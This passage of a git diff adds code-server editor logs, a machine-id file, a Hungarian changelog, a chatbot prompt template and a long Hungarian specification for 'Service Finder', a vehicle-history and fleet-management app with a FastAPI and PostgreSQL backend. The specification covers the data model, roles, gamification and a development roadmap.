Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:31.091 [info] Getting sessions for all scopes... +2026-02-02 22:14:31.091 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.github/GitHub.log new file mode 100755 index 0000000..8e6f54a --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-02-02 22:14:29.965 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/ptyhost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/ptyhost.log new file mode 100755 index 0000000..42bc9bb --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/ptyhost.log @@ -0,0 +1,24 @@ +2026-01-30 17:35:16.587 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-30 17:35:20.892 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-30 17:35:20.893 [info] Persistent process reconnection "1" +2026-01-30 17:35:20.929 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-01-31 09:15:36.932 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-31 09:15:37.241 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-31 09:15:37.241 [info] Persistent process reconnection "1" +2026-01-31 09:15:37.249 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-01-31 10:53:13.854 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-31 10:53:14.099 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-31 10:53:14.099 [info] Persistent process reconnection "1" +2026-01-31 10:53:14.108 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-02-01 10:47:08.240 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-02-01 10:47:08.593 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-02-01 10:47:08.594 [info] Persistent process reconnection "1" +2026-02-01 10:47:08.611 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-02-01 22:43:13.125 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-02-01 22:43:13.449 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-02-01 22:43:13.450 [info] Persistent process reconnection "1" +2026-02-01 22:43:13.472 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-02-02 22:14:28.913 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-02-02 22:14:30.308 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-02-02 22:14:30.308 [info] Persistent process reconnection "1" +2026-02-02 22:14:30.321 [info] Persistent process "1": Replaying 47 chars and 1 size events diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/remoteTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/remoteTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/remoteagent.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/remoteagent.log new file mode 100755 index 0000000..adfe4e0 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/remoteagent.log @@ -0,0 +1,58 @@ +2026-01-29 21:45:20.401 [info] + + + + +2026-01-29 21:45:20.416 [info] Extension host agent started. +2026-01-29 21:45:20.456 [error] [192.168.100.179][9f4b60a3][ExtensionHostConnection] Unknown reconnection token (never seen). +2026-01-29 21:45:25.236 [error] [192.168.100.179][fc5af76c][ManagementConnection] Unknown reconnection token (never seen). +2026-01-29 21:56:09.009 [info] [192.168.100.179][cb7e3643][ManagementConnection] New connection established. +2026-01-29 21:56:09.724 [info] [192.168.100.179][0a163e9d][ExtensionHostConnection] New connection established. +2026-01-29 21:56:09.771 [info] [192.168.100.179][0a163e9d][ExtensionHostConnection] <536> Launched Extension Host Process. +2026-01-29 21:56:10.028 [info] [192.168.100.179][0a163e9d][ExtensionHostConnection] <536> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-30 02:08:29.797 [error] Error: read ECONNRESET + at TCP.onStreamRead (node:internal/stream_base_commons:216:20) +2026-01-30 02:08:29.806 [info] [192.168.100.179][cb7e3643][ManagementConnection] The client has disconnected, will wait for reconnection 3h before disposing... +2026-01-30 05:08:38.689 [info] [192.168.100.179][cb7e3643][ManagementConnection] The reconnection grace time of 3h has expired, so the connection will be disposed. +2026-01-30 05:08:43.469 [info] [192.168.100.179][0a163e9d][ExtensionHostConnection] <536> Extension Host Process exited with code: 0, signal: null. +2026-01-30 17:35:14.917 [info] [192.168.100.179][f7137067][ManagementConnection] New connection established. +2026-01-30 17:35:15.716 [info] [192.168.100.179][f34e954b][ExtensionHostConnection] New connection established. +2026-01-30 17:35:15.723 [info] [192.168.100.179][f34e954b][ExtensionHostConnection] <77728> Launched Extension Host Process. +2026-01-30 17:35:15.975 [info] [192.168.100.179][f34e954b][ExtensionHostConnection] <77728> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-31 01:39:06.406 [info] [192.168.100.179][f7137067][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-31 01:39:06.555 [info] [192.168.100.179][f34e954b][ExtensionHostConnection] <77728> Extension Host Process exited with code: 0, signal: null. +2026-01-31 09:15:35.086 [info] [192.168.100.179][eb94e503][ManagementConnection] New connection established. +2026-01-31 09:15:35.889 [info] [192.168.100.179][20bace34][ExtensionHostConnection] New connection established. +2026-01-31 09:15:35.899 [info] [192.168.100.179][20bace34][ExtensionHostConnection] <166721> Launched Extension Host Process. +2026-01-31 09:15:36.154 [info] [192.168.100.179][20bace34][ExtensionHostConnection] <166721> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-31 10:53:10.437 [info] [192.168.100.179][eb94e503][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-31 10:53:10.554 [info] [192.168.100.179][20bace34][ExtensionHostConnection] <166721> Extension Host Process exited with code: 0, signal: null. +2026-01-31 10:53:11.547 [info] [192.168.100.179][8ab0a67c][ManagementConnection] New connection established. +2026-01-31 10:53:12.376 [info] [192.168.100.179][49344707][ExtensionHostConnection] New connection established. +2026-01-31 10:53:12.384 [info] [192.168.100.179][49344707][ExtensionHostConnection] <184448> Launched Extension Host Process. +2026-01-31 10:53:12.645 [info] [192.168.100.179][49344707][ExtensionHostConnection] <184448> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-31 17:27:10.332 [info] [192.168.100.179][8ab0a67c][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-31 17:27:10.443 [info] [192.168.100.179][49344707][ExtensionHostConnection] <184448> Extension Host Process exited with code: 0, signal: null. +2026-02-01 10:47:06.654 [info] [192.168.100.179][07bd2cc3][ManagementConnection] New connection established. +2026-02-01 10:47:07.319 [info] [192.168.100.179][2f62359d][ExtensionHostConnection] New connection established. +2026-02-01 10:47:07.328 [info] [192.168.100.179][2f62359d][ExtensionHostConnection] <254566> Launched Extension Host Process. +2026-02-01 10:47:07.598 [info] [192.168.100.179][2f62359d][ExtensionHostConnection] <254566> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-02-01 15:08:33.759 [info] [192.168.100.179][07bd2cc3][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-02-01 15:08:33.883 [info] [192.168.100.179][2f62359d][ExtensionHostConnection] <254566> Extension Host Process exited with code: 0, signal: null. +2026-02-01 22:43:11.544 [info] [192.168.100.179][7a024c31][ManagementConnection] New connection established. +2026-02-01 22:43:12.283 [info] [192.168.100.179][8d916ed9][ExtensionHostConnection] New connection established. +2026-02-01 22:43:12.293 [info] [192.168.100.179][8d916ed9][ExtensionHostConnection] <301229> Launched Extension Host Process. +2026-02-01 22:43:12.562 [info] [192.168.100.179][8d916ed9][ExtensionHostConnection] <301229> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-02-02 01:36:05.109 [info] [192.168.100.179][7a024c31][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-02-02 01:36:05.186 [info] [192.168.100.179][8d916ed9][ExtensionHostConnection] <301229> Extension Host Process exited with code: 0, signal: null. +2026-02-02 22:14:28.195 [info] [192.168.100.179][790e4a0c][ManagementConnection] New connection established. +2026-02-02 22:14:28.879 [info] [192.168.100.179][a42b8966][ExtensionHostConnection] New connection established. +2026-02-02 22:14:28.890 [info] [192.168.100.179][a42b8966][ExtensionHostConnection] <332306> Launched Extension Host Process. +2026-02-02 22:14:29.205 [info] [192.168.100.179][a42b8966][ExtensionHostConnection] <332306> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/.vscode_config/.local/share/code-server/machineid b/.vscode_config/.local/share/code-server/machineid new file mode 100755 index 0000000..6fabfdd --- /dev/null +++ b/.vscode_config/.local/share/code-server/machineid @@ -0,0 +1 @@ +ca0655ef-1b79-4fb6-8781-b3e7de15bfb1 \ No newline at end of file diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100755 index 0000000..11a5433 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,5 @@ +## [16.0] - 2026-01-25 +### Hozzáadva +- Smart Tiles: Csempe alapú nézet a Dashboardon. +- Brand logók és okmány-lejárat figyelmeztetések. +- Automata NAS mentés funkció a telepítőben. diff --git a/Promptok gemekhez.txt b/Promptok gemekhez.txt new file mode 100755 index 0000000..07566ee --- /dev/null +++ b/Promptok gemekhez.txt @@ -0,0 +1,5 @@ +🛠️ Prompt más GEM-ekhez (Hibajavításhoz) + +Ha egy másik chatben akarsz megoldatni egy specifikus hibát, használd ezt a promptot: + + "Szia! Egy Python/FastAPI backend fejlesztésében kell segítened. A rendszer Dockerben fut. Technikai adatok: SQLAlchemy (async), Pydantic V2, Alembic. Útvonalak: A projektem a /home/coder/project/opt/service_finder/backend mappában van. Hiba kontextusa: [IDE MÁSOLD A HIBAÜZENETET]. Kérlek, adj megoldást a fenti útvonalak és a 'data' séma használatával. Ne javasolj olyan módosítást, ami törli a meglévő táblákat vagy megváltoztatja a könyvtárszerkezetet!" \ No newline at end of file diff --git a/Service_finder Rendszerspecifikáció es feljesztes.txt b/Service_finder Rendszerspecifikáció es feljesztes.txt new file mode 100755 index 0000000..825f349 --- /dev/null +++ b/Service_finder Rendszerspecifikáció es feljesztes.txt @@ -0,0 +1,1440 @@ +2026.01.25 Leírás Bővített + +Nem kell semmilyen trükköt alkalmaznod, hiszen a beszélgetésünk minden részlete itt van a „fejemben” (a kontextusban). Az a feladatom, hogy ezt a tudást strukturáljam és átadjam neked. + +Mivel a célod az, hogy **egyetlen, mindent átfogó dokumentumod** legyen, amit egy új GEM-be betáplálhatsz, most összegyúrtam az összes eddigi technikai döntést, üzleti logikát, jövőbeli tervet és egyeztetett szabályt. + +Ezt a szöveget másold ki, és ez legyen az **ÚJ GEM Rendszerutasítása (System Instructions)**. Ez a létező legrészletesebb leirat a projektünkről. + +--- + +# 🚀 SERVICE FINDER - TELJES RENDSZER- ÉS FEJLESZTÉSI DOKUMENTÁCIÓ (v3.0) + +Ez a dokumentum a "Service Finder" alkalmazás teljes körű, minden részletre kiterjedő leírása. Tartalmazza az architektúrát, az adatmodellt, az üzleti logikát, a jogosultsági rendszert és a jövőbeli ütemtervet. + +--- + +## 1. A PROJEKT IDENTITÁSA ÉS FILOZÓFIÁJA + +* **Név:** Service Finder (Digital Twin Platform). +* **Alapkoncepció:** A jármű egy önálló entitás („Digitális Iker”), amelynek története és adatai függetlenek a tulajdonostól. +* **Aranyszabály (The Golden Rule):** **„A jármű örök, a tulajdonos vándor.”** +* Járművet és Felhasználót soha nem törlünk véglegesen (kivéve adminisztratív megsemmisítés). +* Csak inaktiválás (Soft Delete) vagy lecsatolás (Unlink) létezik. + + +* **Architektúra:** **„Smart Backend, Dumb Frontend”** (Vékony kliens). +* A frontend nem végez számításokat, csak megjelenít. +* Minden validációt, kalkulációt és döntést a backend végez. + + + +--- + +## 2. ÜZEMELTETÉSI KÖRNYEZET (TECH STACK) + +* **Szerver IP:** `192.168.100.43` +* **Konténerizáció (Docker Compose):** +* `service_finder_api`: Backend (Python 3.12 + FastAPI + Uvicorn). Port: `8000`. +* `service_finder_db`: Adatbázis (PostgreSQL). Port: `5432`. +* `pgadmin`: Adatbázis menedzsment. + + +* **Adatbázis technológia:** PostgreSQL, aszinkron eléréssel (`asyncpg`), SQLAlchemy ORM, Alembic migrációk. +* **Frontend:** HTML5, Bootstrap 5, Vanilla JS (Fetch API). Nincs nehéz keretrendszer (React/Angular), hogy a kód hordozható és egyszerű maradjon. +* **Mobil App stratégia:** Offline-first működés (helyi tárolás), amely hálózat esetén szinkronizál a szerverrel. + +--- + +## 3. ADATBÁZIS ÉS ADATSTRUKTÚRA (`data` séma) + +### 3.1 Törzsadatok (Katalógus - Big Data) + +Statikus, központi adatbázis a járművek pontos meghatározásához. + +* **Márkák:** Név, Logo URL (a csempés megjelenítéshez). +* **Modellek & Típusok:** Részletes specifikációk (Motorizáció, Üzemanyag, Generáció). +* **Felszereltség:** Gyári extrák listája (JSON). + +### 3.2 Járművek (`data.user_vehicles`) + +A fizikai autó digitális leképzése. + +* **Azonosítás:** `id`, `vin` (Alvázszám - Egyedi, nem módosítható!), `license_plate` (Rendszám). +* **Tulajdonos:** `user_id` (Csak az aktuális birtokost jelöli). +* **Technikai állapot:** +* `current_odometer`: A rendszer által folyamatosan frissített, aktuális km állás. +* `initial_odometer`: Rendszerbe lépéskori km. + + +* **Okmányok:** `mot_expiry_date` (Műszaki), `insurance_expiry_date` (Biztosítás). +* **Beállítások:** `is_primary` (Elsődleges jármű jelölő a gyors rögzítéshez). + +### 3.3 Események (`data.vehicle_events`) + +A jármű élettörténete (Append-only napló). + +* **Adatok:** `event_type` (Tankolás, Szerviz, Javítás, Parkolás, Matrica), `amount` (Összeg), `description`. +* **Kritikus adatok:** `event_date` (Tényleges dátum - lehet múltbeli is!), `odometer` (Km állás az eseménykor). +* **Minősítés (Verification Level):** +* `A` (Hitelesített): Rendszeren keresztüli, vagy számlával/fotóval igazolt. +* `B` (Deklarált): Felhasználó által rögzített. +* `C` (Legacy): Rendszerbe lépés előtti, importált adat. +* `U` (Ismeretlen): Nincs adat. + + + +### 3.4 Felhasználók (`data.users`) + +* **Adatok:** `email`, `hashed_password`, `full_name`. +* **Típus:** `company_type` ('PRIVATE' - Magánszemély/Minicég, 'CORPORATE' - Cég). +* **Céges adat:** `tax_number` (Csak céges profilnál kötelező). +* **UI Preferencia:** `ui_skin` ('CLEAN' - Letisztult céges, 'FUN' - Egyedi/Játékos). + +--- + +## 4. MŰKÖDÉSI ÉS ÜZLETI LOGIKA + +### 4.1 Regisztrációs Folyamat + +1. **Egykapus rendszer:** Mindenki ugyanott regisztrál (`/auth/register`). +2. **Adatbekérés:** Teljes név, Email, Jelszó (kötelező). +3. **Típus elágazás:** +* **Magánszemély / Minicég:** Nem ad meg adószámot. Nincs szigorú cégellenőrzés. +* **Cég (Corporate):** Adószám megadása kötelező. (Később API alapú cégadat ellenőrzés). + + +4. **Visszaigazolás:** Email kiküldése megerősítő linkkel. A fiók csak kattintás után aktív. + +### 4.2 Jármű Életút Kezelés (VIN Logic) + +* **Új jármű felvétele:** A rendszer először **VIN (Alvázszám)** alapján keres az adatbázisban. +* **Ha létezik:** Nem hoz létre újat! A meglévő jármű `user_id`-ját frissíti az új tulajdonosra (birtokba vétel). A jármű előélete megmarad. +* **Ha nem létezik:** Létrehozza az új rekordot. + + +* **Eltávolítás:** A felhasználó a "Lecsatolás" gombbal kiveszi a garázsából. A jármű az adatbázisban marad "gazdátlan" státuszban, vagy archív tulajdonosi előzménnyel. + +### 4.3 Költség és Km Szinkronizáció (Smart Update) + +* Amikor a felhasználó eseményt rögzít (pl. Tankolás 150.000 km-nél): +1. A Backend ellenőrzi: `Beküldött km >= Jelenlegi km?` +2. Ha érvényes, elmenti az eseményt. +3. **Automatizmus:** A Backend frissíti a `user_vehicles.current_odometer` mezőt az újra. Így a jármű állapota mindig naprakész. + + + +--- + +## 5. JOGOSULTSÁGI RENDSZER (RBAC) + +### 5.1 Szerepkörök (Roles) + +1. **TULAJDONOS (Owner):** Jogi birtokos. Teljes körű jogok (szerkesztés, lecsatolás, sofőr hozzáadás). +2. **FLOTTA MANAGER:** Céges környezetben az autók kezelője. Jogosítványokat, orvosi engedélyeket ellenőriz. +3. **SOFŐR (Driver):** Csak a hozzá rendelt autót látja. +* **Korlátozás:** Csak költséget/eseményt rögzíthet. Törzsadatot nem módosíthat. +* **Ellenőrzés:** Ha a sofőr jogosítványa ("B") nem felel meg a járműnek ("C"), a rendszer **PIROS** riasztást küld a Managernek. + + +4. **SZERVIZ PARTNER:** Validált bejegyzéseket tehet a szervizkönyvbe. + +--- + +## 6. MEGJELENÍTÉS ÉS UI/UX (Smart Dashboard) + +### 6.1 Csempe Nézet (Smart Tiles) + +Minden jármű egy interaktív kártya. + +* **Fejléc:** Márka logó (kicsiben) + Rendszám + Becenév. +* **Adatok:** Típus, Aktuális km. +* **Vizuális állapotjelzők (Traffic Light System):** +* 🔴 **PIROS Felkiáltójel:** Kritikus hiba (Lejárt műszaki, lejárt biztosítás, túlfutott szervizintervallum > 1000 km). +* 🟡 **SÁRGA Felkiáltójel:** Figyelmeztetés (30 napon belüli lejárat, közeledő szerviz). +* 🟢 **Zöld Pipa / Keret:** Minden rendben. + + + +### 6.2 Funkciók a Dashboardon + +* **Elsődleges Jármű:** Külön kiemelt hely/gomb a "Primary" autónak a villámgyors rögzítéshez. +* **Skin Választó:** +* *Cégeknek:* Letisztult, Excel-szerű táblázatos nézet. +* *Magánszemélyeknek:* "Fun", grafikus, testreszabható felület. + + + +--- + +## 7. SZOCIÁLIS ÉS KÖZÖSSÉGI FUNKCIÓK (Jövőkép) + +### 7.1 Adatgyűjtés (Harvesting) + +* A rendszer anonim módon gyűjti a szervizköltségeket, hogy piaci átlagárakat képezzen ("Mennyibe kerül egy Citigo vezérléscsere?"). + +### 7.2 Szerviz és Értékelés + +* **Szervizkereső:** A felhasználó kereshet a közelben lévő, rendszer által minősített szervizeket. +* **Hiteles Értékelés:** Csak az értékelhet szervizt, akinek van **igazolt** (GPS vagy számla alapú) eseménye az adott helyen. +* **"Social Help":** Pánikgomb lerobbanás esetére, ami értesíti a közeli márkatársakat vagy autómentőket. + +--- + +## 8. SPECIÁLIS KEZELÉSI ESETEK + +* **Történelmi Adatok (Múlt):** +* Lehetőség van visszamenőleges rögzítésre (Dátumválasztóval). +* Ezek az adatok alacsonyabb (`C` vagy `Legacy`) minősítést kapnak a megbízhatósági indexben. + + +* **Hibás rögzítés:** +* Felhasználó nem törölhet eseményt véglegesen (hogy ne lehessen manipulálni a szervizkönyvet). +* Csak "Stornó" bejegyzés tehető, vagy Adminisztrátori kérésre javítható. + + + +--- + +## 9. API VÉGPONT STRATÉGIA + +Minden funkció REST API végponton érhető el (`/api/v1`). + +* **Auth:** `register`, `login`, `verify-email`, `password-reset`. +* **Fleet:** +* `POST /vehicles` (Jármű felvétel - VIN logikával). +* `GET /vehicles` (Lista - Jogosultság szűrve). +* `DELETE /vehicles/{id}` (Lecsatolás a garázsból). +* `POST /vehicles/{id}/events` (Költség rögzítés + Odometer frissítés). + + +* **Catalog:** Márkák, modellek, logók lekérése. +* **Users:** Profil kezelés, sofőr adatok (jogosítvány érvényesség). + +--- + +Ez a dokumentáció tartalmazza a **Service Finder** projekt teljes tudásanyagát a 2026.01.25-ös állapot szerint. Minden fejlesztésnek ezt a logikai keretrendszert kell követnie. + +__________________________________________________________________________________________ +Nem töröltem ki semmit, minden funkció (a korábbi V1.0-tól a legfrissebb ötletekig) benne van, de a szerkezetet átalakítottam úgy, hogy a Gamifikáció és a Verseny (Adatfeltöltés) a prioritási lista elejére került, és az Üzleti Modell (Lejárat/Családi flotta) a legfrissebb logikát tükrözi. + +Ezt a blokkot mentsd el. + +📂 SERVICE FINDER – UNIFIED MASTER SPECIFICATION +Verzió: 3.0 (Konszolidált Mesterterv) Prioritás: Gamifikáció vezérelt Bevezetés (Launch) Dátum: 2026.01.24. + +🟢 HOGYAN HASZNÁLD EZT A DOKUMENTUMOT? +(Másold be ezt a szöveget új chat indításakor) + +"Szia! Itt a Service Finder projekt aktuális, konszolidált Mesterterve. Minden korábbi verzió és ötlet ebben van egyesítve. A fejlesztési prioritás a 'Gamifikáció és Adatfeltöltés', mint a rendszer motorja. Kérlek, olvasd el, tárold el a memóriádban, és ez alapján folytassuk a munkát." + +🏗️ I. ARCHITEKTURÁLIS ALAPELVEK (TECH STACK) +A rendszer nem egyetlen app, hanem egy moduláris ökoszisztéma ("Modular Monolith"). + +Platform: Docker konténerizált környezet. + +Backend: Python FastAPI (Aszinkron). + +Adatbázis: PostgreSQL 15 (Shared DB - Minden modul közös adatbázist használ, szeparált sémákkal). + +Fájltárolás: MinIO (S3 kompatibilis - Képek, Dokumentumok, OCR alapanyag). + +Frontend: React (SPA/PWA) - Mobilapp-szerű élmény, "buildelt" kódvédelem. + +Elérés & Proxy: Nginx Proxy Manager (dev.profibot.hu, stb.). + +🔑 II.0 REGISZTRÁCIÓ ÉS BIZTONSÁGI PROTOKOLL (v1.0) +A rendszerbe való belépés többszintű védelmi vonalon keresztül történik a botok és csalások kiszűrése érdekében. + +Eszközszintű védelem (Rate Limiting): + +ID alapú korlát: Egy adott eszközről (Device ID) 24 órán belül maximum 3 regisztrációs kísérlet engedélyezett. + +Hűtési időszak: A limit elérése után az eszköz 24 órára zárolásra kerül az új regisztrációk elől (elkerülve a tömeges bot-regisztrációt, de kímélve a használt mobilt vásárlókat). + +Többcsatornás Hitelesítés (Omnichannel Verification): + +Email: Alapértelmezett visszaigazolás (AWS SES alapokon). + +Telefonszám (Kritikus műveletekhez): Kötelező a versenyben való részvételhez és a Szerviz Partnereknek. + +Csatornaválasztás: A felhasználó választhat, hogy a hitelesítő kódot SMS, WhatsApp vagy Telegram üzenetben kéri-e (költséghatékony és modern megoldás). + +Flash Call opció: A rendszer egy véletlenszerű számról hívást indít, a usernek a hívó fél utolsó 4 számjegyét kell beírnia (opcionális, költségkímélő). + +Hibrid Social Login: + +Google / Apple ID: Engedélyezett a gyors belépéshez. + +Adatkiegészítés: Ha a közösségi fiók nem tartalmaz minden szükséges adatot (pl. telefonszám), a rendszer egy popup ablakban kéri be azokat az első kritikus művelet előtt. + +Bot-elleni védelem: + +Láthatatlan reCAPTCHA v3 integráció a háttérben a gyanús tevékenységek (automatizált script-ek) kiszűrésére. + +🏆 II. A "LAUNCH ENGINE": GAMIFIKÁCIÓ ÉS VERSENY (PRIORITÁS #1) +Ez a rendszer legfontosabb eleme az induláskor. Cél: A térkép "kifehérítése" és az adatbázis feltöltése közösségi erővel. + +1. A Nagy Adatverseny (The Data Race) +Cél: Minél több minőségi szerviz és járműadat rögzítése rövid idő alatt. + +Szezonok: 3-6 havonta zárás és díjazás. + +Pontrendszer: + ++10 pont: Új szerviz rögzítése (Fotó + Nyitvatartás + Alapadatok). + ++5 pont: Márkaspecializáció rögzítése (Validáltan). + ++50 pont: Hirdető beszervezése (Partnerkód megadásával). + ++1 pont: Validálás (Más által feltöltött adat ellenőrzése). + +Büntetés és Kizárás: + +-2 pont: Téves adat beküldése. + +-10 pont (Kritikus szint): Kizárás a versenyből. A felhasználó "Read-only" (csak olvasó) módba kerül a közösségi téren, nem vihet fel új szervizt. + +2. Díjazás és Ranglisták +Jutalmak: + +1-3. hely: Pénzjutalom. + +4-10. hely: VIP előfizetés (1 év). + +További helyezettek: Prémium tagságok (6-3 hónap). + +Speciális Szerepkörök: + +Helyi Validátor: A régió legaktívabb adatfeltöltője. Ő hagyhatja jóvá a vitatott módosításokat és szervezhet hirdetéseket. + +👤 III. FELHASZNÁLÓK ÉS "MINI CÉGEK" (RBAC) +A rendszer mindenkit "Flottaként" kezel, a magánszemélytől a nagyvállalatig. + +1. Magánszemély = "Családi Flotta" (Mini Cég) +Struktúra: A Családfő (Tulajdonos) kezeli a fiókot. + +Tagok: Max 4 fő (Házastárs, Gyerekek) hívható meg "Sofőr" szerepkörbe. + +Limit: Alapcsomagban 3 jármű. + +Logika: A háttérben ugyanaz a céges logika fut, csak a felület barátságosabb ("Családtag meghívása"). + +2. Jogosultsági Szintek (Dinamikus) +Cégtulajdonos: Jogokat oszt/von meg (pl. kilépő dolgozó). Beállíthatja, ki rögzíthet költséget. + +Flotta Manager: Látja a TMS-t, riasztásokat, költségeket. + +Sofőr: + +Csak a hozzá rendelt időszakban látja az autót. + +Jogosultság: Csak Tankolás / Szerviz Rögzítés / Teljes Nézet. + +Hirdetésszervező / Validátor: + +Helyi szervizek fizikai ellenőrzése. + +Szervizek "beszervezése" hirdetőnek (Kredit jutalékért). + +📊 IV. ÜZLETI MODELL, LEJÁRAT ÉS HIRDETÉS (V2.5) +1. Előfizetési Csomagok +Free: Max 3 jármű. (Reklámokkal, Hirdetők előre sorolva). + +Premium / VIP: Magasabb limitek, reklámmentes, Excel export, részletes statisztika. + +Kiegészítő Járműdíj (Add-on): + +Opció csomagváltás helyett (+1 autó). + +Magán: +300 Ft (vagy kredit) / hó. + +Céges: +500 Ft (2 €) / hó. + +2. Lejárat Kezelése (3 Fázisú Lifecycle) +Ha az előfizetés lejár: + +Türelmi Idő (1-30. nap) - "Vak Rögzítés": + +Adatot lehet rögzíteni (nincs lyuk a szervizkönyvben). + +Statisztika, Költségösszesítő, Előzmények NEM láthatóak. + +Trust Score csökken. + +Leminősítés (31. naptól): + +Visszaáll Free szintre (Max 3 autó). A többi autó zárolásra kerül. + +Visszamenőleges Aktiválás (Max 60. napig): + +Ha rendezi a díjat (visszamenőleg is), az adatok és a Trust Score helyreállnak. + +3. Hirdetési Rendszer (Hibrid) +Szervizeknek: + +Idő alapú: Havi fix díjért kiemelt hely. + +Kredit alapú (PPC): Egyenlegből vonódik le a megjelenés/kattintás. + +Promóció (Win-Win): + +User meghívja a szervizt -> User Kreditet kap. + +User az Appra hivatkozik ("Innen jöttem") -> Szerviz Kedvezményt ad a munkadíjból. + +🚗 V. JÁRMŰ ÉS KÖLTSÉG NYILVÁNTARTÁS (CORE) +1. Jármű Adatmodell (Deep Dive) +Törzsadatok: Kategória -> Márka -> Modell -> Generáció -> Motor. + +Felszereltség: Dinamikus (Klíma, Multimédia, Felépítmény, Speciális eszközök). + +Gumiabroncs Modul: Márka, Típus, Évszak, DOT szám figyelés (Riasztás 6 évnél öregebb guminál). + +Trust Score: Százalékos megbízhatósági index (Fotó, Validált szerviz, Folyamatos km rögzítés növeli). + +2. Költségnyilvántartás +Üzemeltetés: Üzemanyag, Adalék, Mosás, Parkolás. + +Hatósági: Adók (Súly/Cégautó), Útdíj (Matrica/HU-GO), Bírságok. + +Pénzügyi: Vételár, Lízing, Hitel, Értékcsökkenés. + +Karbantartás: Szerviz, Gumi, Alkatrész. + +Láthatóság (Privacy): Tulajdonosváltáskor az új tulajdonos nem látja a régi költségeit részletesen, csak statisztikát. + +🛠️ VI. SZERVIZ KERESŐ ÉS SOS +Struktúra: Fa-rendszerű kategóriák (pl. Járműépítés -> Lakóautó -> Bútorozás). + +Keresési Logika: Relevancia > Távolság > Hirdetői Státusz (Free) > Minőség. + +SOS Protokoll: Választható "Biztonságos" (Szerződött partner) vagy "Gyors" (Legközelebbi műhely) opció. + +Értékelés: Többszempontú (Szakmai, Ár, Sebesség). Csak validált látogatás után adható. + +📡 VII. HALADÓ MODULOK (JÖVŐBENI BŐVÍTÉS) +Ezek az alaprendszerre épülnek, de külön fejlesztési fázisok. + +TMS (Logisztika): Útvonaltervezés, Fuvarszervezés, Sofőr app nézet. + +Telematika (Biztosítás): Opt-in adatgyűjtés (GPS, G-szenzor) a "Pay-how-you-drive" biztosításhoz. + +Nemzetközi Modul: Ország sablonok (Vizsga intervallumok, Kötelező tartozékok betöltése). + +Rendezvények: Eseménynaptár, Márkatalálkozók, Túrák szervezése. + +🗓️ VIII. FEJLESZTÉSI ÜTEMTERV (ÚJ PRIORITÁSOK) +FÁZIS 1 (MVP + LAUNCH ENGINE): + +Core Modul: Jármű, Költség, Szervizkereső, User/Cég alapok. + +Gamifikáció: Verseny, Pontozás, Validálás (Hogy legyen adat!). + +Üzlet: "Vak rögzítés" és Lejárat logikája. + +FÁZIS 2 (NÖVEKEDÉS): + +OCR: Hogy könnyebb legyen a feltöltés. (prémium és vip előfizetéssel credit levonállsal hanincs előfizetés vagy kredit nem aktív) + +Referral Rendszer: Meghívók és Kreditek követése. + +Ország Sablonok: 